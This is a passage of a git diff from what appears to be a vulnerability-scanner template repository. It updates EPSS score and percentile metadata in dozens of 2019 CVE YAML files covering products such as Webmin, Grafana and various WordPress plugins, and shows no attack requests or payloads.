b/http/cves/2019/CVE-2019-12990.yaml index 079570202a..0e25b2dd6c 100644 --- a/http/cves/2019/CVE-2019-12990.yaml +++ b/http/cves/2019/CVE-2019-12990.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-12990 cwe-id: CWE-22 epss-score: 0.95724 - epss-percentile: 0.99228 + epss-percentile: 0.99229 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2019/CVE-2019-13101.yaml b/http/cves/2019/CVE-2019-13101.yaml index eb0825d332..4f4e22750c 100644 --- a/http/cves/2019/CVE-2019-13101.yaml +++ b/http/cves/2019/CVE-2019-13101.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-13101 cwe-id: CWE-306 epss-score: 0.03717 - epss-percentile: 0.9073 + epss-percentile: 0.90736 cpe: cpe:2.3:o:dlink:dir-600m_firmware:3.02:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-13392.yaml b/http/cves/2019/CVE-2019-13392.yaml index dacf082ed0..416e98e9c9 100644 --- a/http/cves/2019/CVE-2019-13392.yaml +++ b/http/cves/2019/CVE-2019-13392.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-13392 cwe-id: CWE-79 epss-score: 0.0014 - epss-percentile: 0.49525 + epss-percentile: 0.49541 cpe: cpe:2.3:a:mindpalette:natemail:3.0.15:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-13396.yaml b/http/cves/2019/CVE-2019-13396.yaml index 0db9576d44..7af9bcdf76 100644 --- a/http/cves/2019/CVE-2019-13396.yaml +++ b/http/cves/2019/CVE-2019-13396.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-13396 cwe-id: CWE-22 epss-score: 0.02107 - epss-percentile: 0.87935 + epss-percentile: 0.87941 cpe: cpe:2.3:a:getflightpath:flightpath:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-13462.yaml b/http/cves/2019/CVE-2019-13462.yaml index eb68bc0d2e..6d4644284d 100644 --- a/http/cves/2019/CVE-2019-13462.yaml +++ b/http/cves/2019/CVE-2019-13462.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-13462 cwe-id: CWE-89 epss-score: 0.36935 - epss-percentile: 0.96736 + epss-percentile: 0.96737 cpe: cpe:2.3:a:lansweeper:lansweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14205.yaml b/http/cves/2019/CVE-2019-14205.yaml index 93b2b56221..85b190a8de 100644 --- a/http/cves/2019/CVE-2019-14205.yaml +++ b/http/cves/2019/CVE-2019-14205.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-14205 cwe-id: CWE-22 epss-score: 0.05117 - epss-percentile: 0.92062 + epss-percentile: 0.92073 cpe: cpe:2.3:a:nevma:adaptive_images:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14223.yaml b/http/cves/2019/CVE-2019-14223.yaml index 0181a8a7e8..265ccc58c3 100644 --- a/http/cves/2019/CVE-2019-14223.yaml +++ b/http/cves/2019/CVE-2019-14223.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-14223 cwe-id: CWE-601 epss-score: 0.00188 - epss-percentile: 0.56103 + epss-percentile: 0.56128 cpe: cpe:2.3:a:alfresco:alfresco:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14251.yaml b/http/cves/2019/CVE-2019-14251.yaml index 126c537782..209aca697e 100644 --- a/http/cves/2019/CVE-2019-14251.yaml +++ b/http/cves/2019/CVE-2019-14251.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-14251 cwe-id: CWE-22 epss-score: 0.01349 - epss-percentile: 0.84679 + epss-percentile: 0.84687 cpe: cpe:2.3:a:temenos:t24:r15.01:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-14312.yaml b/http/cves/2019/CVE-2019-14312.yaml index 5d848730d7..5a123aef67 100644 --- a/http/cves/2019/CVE-2019-14312.yaml +++ b/http/cves/2019/CVE-2019-14312.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-14312 cwe-id: CWE-22 epss-score: 0.02327 - epss-percentile: 0.88542 + epss-percentile: 0.88546 cpe: cpe:2.3:a:aptana:jaxer:1.0.3.4547:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14322.yaml b/http/cves/2019/CVE-2019-14322.yaml index 9c3d5eda8e..109ec4905f 100644 --- a/http/cves/2019/CVE-2019-14322.yaml +++ b/http/cves/2019/CVE-2019-14322.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-14322 cwe-id: CWE-22 epss-score: 0.58463 - epss-percentile: 0.97366 + epss-percentile: 0.97367 cpe: cpe:2.3:a:palletsprojects:werkzeug:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2019/CVE-2019-14470.yaml b/http/cves/2019/CVE-2019-14470.yaml index 0d1ad2d60c..a17b5e753f 100644 --- a/http/cves/2019/CVE-2019-14470.yaml +++ b/http/cves/2019/CVE-2019-14470.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-14470 cwe-id: CWE-79 epss-score: 0.76628 - epss-percentile: 0.97849 + epss-percentile: 0.97852 cpe: cpe:2.3:a:instagram-php-api_project:instagram-php-api:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14530.yaml b/http/cves/2019/CVE-2019-14530.yaml index a130fd3674..7c59dcf42c 100644 --- a/http/cves/2019/CVE-2019-14530.yaml +++ b/http/cves/2019/CVE-2019-14530.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-14530 cwe-id: CWE-22 epss-score: 0.86603 - epss-percentile: 0.9824 + epss-percentile: 0.98242 cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-14696.yaml b/http/cves/2019/CVE-2019-14696.yaml index f1f2a858ed..b504a8b9e4 100644 --- a/http/cves/2019/CVE-2019-14696.yaml +++ b/http/cves/2019/CVE-2019-14696.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-14696 cwe-id: CWE-79 epss-score: 0.00776 - epss-percentile: 0.79359 + epss-percentile: 0.79368 cpe: cpe:2.3:a:open-school:open-school:2.3:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14750.yaml b/http/cves/2019/CVE-2019-14750.yaml index 32801066fd..2a21cf1d48 100644 --- a/http/cves/2019/CVE-2019-14750.yaml +++ b/http/cves/2019/CVE-2019-14750.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-14750 cwe-id: CWE-79 epss-score: 0.05309 - epss-percentile: 0.92221 + epss-percentile: 0.92228 cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2019/CVE-2019-14789.yaml b/http/cves/2019/CVE-2019-14789.yaml index 76d7342a0f..2b18cc2428 100644 --- a/http/cves/2019/CVE-2019-14789.yaml +++ b/http/cves/2019/CVE-2019-14789.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-14789 cwe-id: CWE-79 epss-score: 0.00125 - epss-percentile: 0.467 + epss-percentile: 0.46711 cpe: cpe:2.3:a:kunalnagar:custom_404_pro:3.2.8:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-14974.yaml b/http/cves/2019/CVE-2019-14974.yaml index 24002d450e..57ac393908 100644 --- a/http/cves/2019/CVE-2019-14974.yaml +++ b/http/cves/2019/CVE-2019-14974.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2019-14974 cwe-id: CWE-79 epss-score: 0.00217 - epss-percentile: 0.59583 + epss-percentile: 0.59616 cpe: cpe:2.3:a:sugarcrm:sugarcrm:9.0.0:*:*:*:enterprise:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-15043.yaml b/http/cves/2019/CVE-2019-15043.yaml index 7578a5d92d..0dc4a6ddab 100644 --- a/http/cves/2019/CVE-2019-15043.yaml +++ b/http/cves/2019/CVE-2019-15043.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-15043 cwe-id: CWE-306 epss-score: 0.22002 - epss-percentile: 0.95924 + epss-percentile: 0.95926 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-15107.yaml b/http/cves/2019/CVE-2019-15107.yaml index 5ce541cb2d..e9fbfa00a1 100644 --- a/http/cves/2019/CVE-2019-15107.yaml +++ b/http/cves/2019/CVE-2019-15107.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-15107 cwe-id: CWE-78 epss-score: 0.97494 - epss-percentile: 0.99972 + epss-percentile: 0.99971 cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-15501.yaml b/http/cves/2019/CVE-2019-15501.yaml index ee8b91cc56..c1c877d785 100644 --- a/http/cves/2019/CVE-2019-15501.yaml +++ b/http/cves/2019/CVE-2019-15501.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-15501 cwe-id: CWE-79 epss-score: 0.00303 - epss-percentile: 0.66306 + epss-percentile: 0.66341 cpe: cpe:2.3:a:lsoft:listserv:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-15642.yaml b/http/cves/2019/CVE-2019-15642.yaml index f351c172fa..abaacf6217 100644 --- a/http/cves/2019/CVE-2019-15642.yaml +++ b/http/cves/2019/CVE-2019-15642.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-15642 cwe-id: CWE-94 epss-score: 0.26994 - epss-percentile: 0.96237 + epss-percentile: 0.96241 cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-15713.yaml b/http/cves/2019/CVE-2019-15713.yaml index 0d91a3c409..63d9fecf3a 100644 --- a/http/cves/2019/CVE-2019-15713.yaml +++ b/http/cves/2019/CVE-2019-15713.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-15713 cwe-id: CWE-79 epss-score: 0.00101 - epss-percentile: 0.41278 + epss-percentile: 0.41303 cpe: cpe:2.3:a:my_calendar_project:my_calendar:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-15811.yaml b/http/cves/2019/CVE-2019-15811.yaml index 8a76857c43..0114aa5fe3 100644 --- a/http/cves/2019/CVE-2019-15811.yaml +++ b/http/cves/2019/CVE-2019-15811.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-15811 cwe-id: CWE-79 epss-score: 0.00376 - epss-percentile: 0.69761 + epss-percentile: 0.69788 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-15829.yaml b/http/cves/2019/CVE-2019-15829.yaml index 775e20d8d2..1e85ad8561 100644 --- a/http/cves/2019/CVE-2019-15829.yaml +++ b/http/cves/2019/CVE-2019-15829.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-15829 cwe-id: CWE-79 epss-score: 0.00146 - epss-percentile: 0.50363 + epss-percentile: 0.50388 cpe: cpe:2.3:a:greentreelabs:gallery_photoblocks:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-15858.yaml b/http/cves/2019/CVE-2019-15858.yaml index 6b9a230861..57da370495 100644 --- a/http/cves/2019/CVE-2019-15858.yaml +++ b/http/cves/2019/CVE-2019-15858.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-15858 cwe-id: CWE-306 epss-score: 0.02782 - epss-percentile: 0.8948 + epss-percentile: 0.89487 cpe: cpe:2.3:a:webcraftic:woody_ad_snippets:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-15859.yaml b/http/cves/2019/CVE-2019-15859.yaml index fdb66e58bd..9e4b929ec8 100644 --- a/http/cves/2019/CVE-2019-15859.yaml +++ b/http/cves/2019/CVE-2019-15859.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-15859 cwe-id: CWE-200 epss-score: 0.12379 - epss-percentile: 0.94805 + epss-percentile: 0.94807 cpe: cpe:2.3:o:socomec:diris_a-40_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-15889.yaml b/http/cves/2019/CVE-2019-15889.yaml index 963ac289bb..96544937fb 100644 --- a/http/cves/2019/CVE-2019-15889.yaml +++ b/http/cves/2019/CVE-2019-15889.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-15889 cwe-id: CWE-79 epss-score: 0.03694 - epss-percentile: 0.90705 + epss-percentile: 0.90711 cpe: cpe:2.3:a:wpdownloadmanager:wordpress_download_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16097.yaml b/http/cves/2019/CVE-2019-16097.yaml index 3224caf85c..1c5d7a19ff 100644 --- a/http/cves/2019/CVE-2019-16097.yaml +++ b/http/cves/2019/CVE-2019-16097.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-16097 cwe-id: CWE-862 epss-score: 0.96909 - epss-percentile: 0.99619 + epss-percentile: 0.9962 cpe: cpe:2.3:a:linuxfoundation:harbor:1.7.0:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16123.yaml b/http/cves/2019/CVE-2019-16123.yaml index 6b79c2aa00..4c8165ddfd 100644 --- a/http/cves/2019/CVE-2019-16123.yaml +++ b/http/cves/2019/CVE-2019-16123.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-16123 cwe-id: CWE-22 epss-score: 0.72953 - epss-percentile: 0.97751 + epss-percentile: 0.97752 cpe: cpe:2.3:a:kartatopia:piluscart:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16278.yaml b/http/cves/2019/CVE-2019-16278.yaml index ed80b05cf8..928061a649 100644 --- a/http/cves/2019/CVE-2019-16278.yaml +++ b/http/cves/2019/CVE-2019-16278.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-16278 cwe-id: CWE-22 epss-score: 0.97366 - epss-percentile: 0.99868 + epss-percentile: 0.99869 cpe: cpe:2.3:a:nazgul:nostromo_nhttpd:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16313.yaml b/http/cves/2019/CVE-2019-16313.yaml index 61fcca1647..d59b039ad9 100644 --- a/http/cves/2019/CVE-2019-16313.yaml +++ b/http/cves/2019/CVE-2019-16313.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-16313 cwe-id: CWE-798 epss-score: 0.02184 - epss-percentile: 0.88178 + epss-percentile: 0.88183 cpe: cpe:2.3:o:ifw8:fr6_firmware:4.31:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16332.yaml b/http/cves/2019/CVE-2019-16332.yaml index d3f1783f06..68293aaf68 100644 --- a/http/cves/2019/CVE-2019-16332.yaml +++ b/http/cves/2019/CVE-2019-16332.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-16332 cwe-id: CWE-79 epss-score: 0.00303 - epss-percentile: 0.66275 + epss-percentile: 0.66309 cpe: cpe:2.3:a:api_bearer_auth_project:api_bearer_auth:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16525.yaml b/http/cves/2019/CVE-2019-16525.yaml index ceef428432..72a977dda2 100644 --- a/http/cves/2019/CVE-2019-16525.yaml +++ b/http/cves/2019/CVE-2019-16525.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-16525 cwe-id: CWE-79 epss-score: 0.00323 - epss-percentile: 0.67436 + epss-percentile: 0.67464 cpe: cpe:2.3:a:checklist:checklist:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16931.yaml b/http/cves/2019/CVE-2019-16931.yaml index 213fb7ea93..ebb748f43d 100644 --- a/http/cves/2019/CVE-2019-16931.yaml +++ b/http/cves/2019/CVE-2019-16931.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-16931 cwe-id: CWE-79 epss-score: 0.00244 - epss-percentile: 0.62216 + epss-percentile: 0.62243 cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-16932.yaml b/http/cves/2019/CVE-2019-16932.yaml index 1dc06464c8..27c89c7501 100644 --- a/http/cves/2019/CVE-2019-16932.yaml +++ b/http/cves/2019/CVE-2019-16932.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-16932 cwe-id: CWE-918 epss-score: 0.53434 - epss-percentile: 0.9723 + epss-percentile: 0.97232 cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16996.yaml b/http/cves/2019/CVE-2019-16996.yaml index 634e8ba062..c2924d670f 100644 --- a/http/cves/2019/CVE-2019-16996.yaml +++ b/http/cves/2019/CVE-2019-16996.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2019-16996 cwe-id: CWE-89 epss-score: 0.24401 - epss-percentile: 0.96084 + epss-percentile: 0.96087 cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16997.yaml b/http/cves/2019/CVE-2019-16997.yaml index c8bbd71b9a..ae79a55631 100644 --- a/http/cves/2019/CVE-2019-16997.yaml +++ b/http/cves/2019/CVE-2019-16997.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2019-16997 cwe-id: CWE-89 epss-score: 0.24401 - epss-percentile: 0.96084 + epss-percentile: 0.96087 cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-17270.yaml b/http/cves/2019/CVE-2019-17270.yaml index 9f52b918b2..437f42f6f5 100644 --- a/http/cves/2019/CVE-2019-17270.yaml +++ b/http/cves/2019/CVE-2019-17270.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-17270 cwe-id: CWE-78 epss-score: 0.93782 - epss-percentile: 0.98859 + epss-percentile: 0.9886 cpe: cpe:2.3:a:yachtcontrol:yachtcontrol:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-17418.yaml b/http/cves/2019/CVE-2019-17418.yaml index d937341c10..16ee79ef4e 100644 --- a/http/cves/2019/CVE-2019-17418.yaml +++ b/http/cves/2019/CVE-2019-17418.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.2 cve-id: CVE-2019-17418 cwe-id: CWE-89 - epss-score: 0.48525 - epss-percentile: 0.97109 + epss-score: 0.44305 + epss-percentile: 0.96978 cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-17444.yaml b/http/cves/2019/CVE-2019-17444.yaml index 8d47da7f77..515376b527 100644 --- a/http/cves/2019/CVE-2019-17444.yaml +++ b/http/cves/2019/CVE-2019-17444.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-17444 cwe-id: CWE-521 epss-score: 0.08495 - epss-percentile: 0.93735 + epss-percentile: 0.9374 cpe: cpe:2.3:a:jfrog:artifactory:*:*:*:*:*:-:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-17503.yaml b/http/cves/2019/CVE-2019-17503.yaml index 15ea9bbd2c..5cc27c7045 100644 --- a/http/cves/2019/CVE-2019-17503.yaml +++ b/http/cves/2019/CVE-2019-17503.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-17503 cwe-id: CWE-425 epss-score: 0.00433 - epss-percentile: 0.7176 + epss-percentile: 0.71785 cpe: cpe:2.3:a:kirona:dynamic_resource_scheduling:5.5.3.5:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-17506.yaml b/http/cves/2019/CVE-2019-17506.yaml index 2faf998efd..de84983a16 100644 --- a/http/cves/2019/CVE-2019-17506.yaml +++ b/http/cves/2019/CVE-2019-17506.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-17506 cwe-id: CWE-306 epss-score: 0.91237 - epss-percentile: 0.98555 + epss-percentile: 0.98556 cpe: cpe:2.3:o:dlink:dir-868l_b1_firmware:2.03:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-17538.yaml b/http/cves/2019/CVE-2019-17538.yaml index 3e59632b30..cee687cbe9 100644 --- a/http/cves/2019/CVE-2019-17538.yaml +++ b/http/cves/2019/CVE-2019-17538.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-17538 cwe-id: CWE-22 epss-score: 0.00838 - epss-percentile: 0.80194 + epss-percentile: 0.80208 cpe: cpe:2.3:a:jnoj:jiangnan_online_judge:0.8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-17574.yaml b/http/cves/2019/CVE-2019-17574.yaml index 7a9df6280a..b53badc936 100644 --- a/http/cves/2019/CVE-2019-17574.yaml +++ b/http/cves/2019/CVE-2019-17574.yaml @@ -20,7 +20,7 @@ info: cve-id: 'CVE-2019-17574' cwe-id: CWE-639 epss-score: 0.14192 - epss-percentile: 0.95089 + epss-percentile: 0.95092 cpe: cpe:2.3:a:code-atlantic:popup_maker:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-17662.yaml b/http/cves/2019/CVE-2019-17662.yaml index 84e1c8ab69..267d8b4a44 100644 --- a/http/cves/2019/CVE-2019-17662.yaml +++ b/http/cves/2019/CVE-2019-17662.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-17662 cwe-id: CWE-22 epss-score: 0.6101 - epss-percentile: 0.97433 + epss-percentile: 0.97434 cpe: cpe:2.3:a:cybelsoft:thinvnc:1.0:b1:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-1821.yaml b/http/cves/2019/CVE-2019-1821.yaml index f4900f9a08..927761b4fa 100644 --- a/http/cves/2019/CVE-2019-1821.yaml +++ b/http/cves/2019/CVE-2019-1821.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-1821 cwe-id: CWE-20 epss-score: 0.96882 - epss-percentile: 0.99604 + epss-percentile: 0.99606 cpe: cpe:2.3:a:cisco:evolved_programmable_network_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-18371.yaml b/http/cves/2019/CVE-2019-18371.yaml index 8ca041a30b..eb8d76eaac 100644 --- a/http/cves/2019/CVE-2019-18371.yaml +++ b/http/cves/2019/CVE-2019-18371.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-18371 cwe-id: CWE-22 epss-score: 0.02855 - epss-percentile: 0.8959 + epss-percentile: 0.89597 cpe: cpe:2.3:o:mi:millet_router_3g_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-18393.yaml b/http/cves/2019/CVE-2019-18393.yaml index 3a6ce1e0c2..94d54afa89 100644 --- a/http/cves/2019/CVE-2019-18393.yaml +++ b/http/cves/2019/CVE-2019-18393.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-18393 cwe-id: CWE-22 epss-score: 0.00161 - epss-percentile: 0.52563 + epss-percentile: 0.52589 cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-18394.yaml b/http/cves/2019/CVE-2019-18394.yaml index a9c754487a..9e3f33c423 100644 --- a/http/cves/2019/CVE-2019-18394.yaml +++ b/http/cves/2019/CVE-2019-18394.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-18394 cwe-id: CWE-918 epss-score: 0.65757 - epss-percentile: 0.97546 + epss-percentile: 0.97548 cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-18665.yaml b/http/cves/2019/CVE-2019-18665.yaml index 024d68e74c..4bfd2cd479 100644 --- a/http/cves/2019/CVE-2019-18665.yaml +++ b/http/cves/2019/CVE-2019-18665.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-18665 cwe-id: CWE-22 epss-score: 0.09963 - epss-percentile: 0.94234 + epss-percentile: 0.94238 cpe: cpe:2.3:a:secudos:domos:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-18818.yaml b/http/cves/2019/CVE-2019-18818.yaml index 7ee50e7140..512040621a 100644 --- a/http/cves/2019/CVE-2019-18818.yaml +++ b/http/cves/2019/CVE-2019-18818.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-18818 cwe-id: CWE-640 epss-score: 0.88966 - epss-percentile: 0.98384 + epss-percentile: 0.98386 cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-18922.yaml b/http/cves/2019/CVE-2019-18922.yaml index b44542c3a4..f0d297e957 100644 --- a/http/cves/2019/CVE-2019-18922.yaml +++ b/http/cves/2019/CVE-2019-18922.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-18922 cwe-id: CWE-22 epss-score: 0.20454 - epss-percentile: 0.95806 + epss-percentile: 0.95808 cpe: cpe:2.3:o:alliedtelesis:at-gs950\/8_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-18957.yaml b/http/cves/2019/CVE-2019-18957.yaml index b2836c9e8b..61246eac75 100644 --- a/http/cves/2019/CVE-2019-18957.yaml +++ b/http/cves/2019/CVE-2019-18957.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-18957 cwe-id: CWE-79 epss-score: 0.00375 - epss-percentile: 0.69733 + epss-percentile: 0.6976 cpe: cpe:2.3:a:microstrategy:microstrategy_library:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-1898.yaml b/http/cves/2019/CVE-2019-1898.yaml index 8910aba424..7f07598298 100644 --- a/http/cves/2019/CVE-2019-1898.yaml +++ b/http/cves/2019/CVE-2019-1898.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-1898 cwe-id: CWE-425,CWE-285 epss-score: 0.07254 - epss-percentile: 0.93302 + epss-percentile: 0.93307 cpe: cpe:2.3:o:cisco:rv110w_firmware:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-19134.yaml b/http/cves/2019/CVE-2019-19134.yaml index 5299bfcc8c..9a93ba7d1a 100644 --- a/http/cves/2019/CVE-2019-19134.yaml +++ b/http/cves/2019/CVE-2019-19134.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-19134 cwe-id: CWE-79 epss-score: 0.00203 - epss-percentile: 0.5807 + epss-percentile: 0.58098 cpe: cpe:2.3:a:heroplugins:hero_maps_premium:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-19368.yaml b/http/cves/2019/CVE-2019-19368.yaml index 32cb0ebcdb..9520ec66a8 100644 --- a/http/cves/2019/CVE-2019-19368.yaml +++ b/http/cves/2019/CVE-2019-19368.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-19368 cwe-id: CWE-79 epss-score: 0.00624 - epss-percentile: 0.76604 + epss-percentile: 0.76626 cpe: cpe:2.3:a:maxum:rumpus:8.2.9.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-1943.yaml b/http/cves/2019/CVE-2019-1943.yaml index d5cf9843bb..130e993dba 100644 --- a/http/cves/2019/CVE-2019-1943.yaml +++ b/http/cves/2019/CVE-2019-1943.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-1943 cwe-id: CWE-601 epss-score: 0.03526 - epss-percentile: 0.90503 + epss-percentile: 0.9051 cpe: cpe:2.3:o:cisco:sg200-50_firmware:-:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2019/CVE-2019-19908.yaml b/http/cves/2019/CVE-2019-19908.yaml index 7ae92e30e0..886c683427 100644 --- a/http/cves/2019/CVE-2019-19908.yaml +++ b/http/cves/2019/CVE-2019-19908.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-19908 cwe-id: CWE-79 epss-score: 0.00673 - epss-percentile: 0.77582 + epss-percentile: 0.77601 cpe: cpe:2.3:a:ciprianmp:phpmychat-plus:1.98:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-19985.yaml b/http/cves/2019/CVE-2019-19985.yaml index d9d8bcdd28..f28fda6aa3 100644 --- a/http/cves/2019/CVE-2019-19985.yaml +++ b/http/cves/2019/CVE-2019-19985.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-19985 cwe-id: CWE-862 epss-score: 0.1336 - epss-percentile: 0.94958 + epss-percentile: 0.94962 cpe: 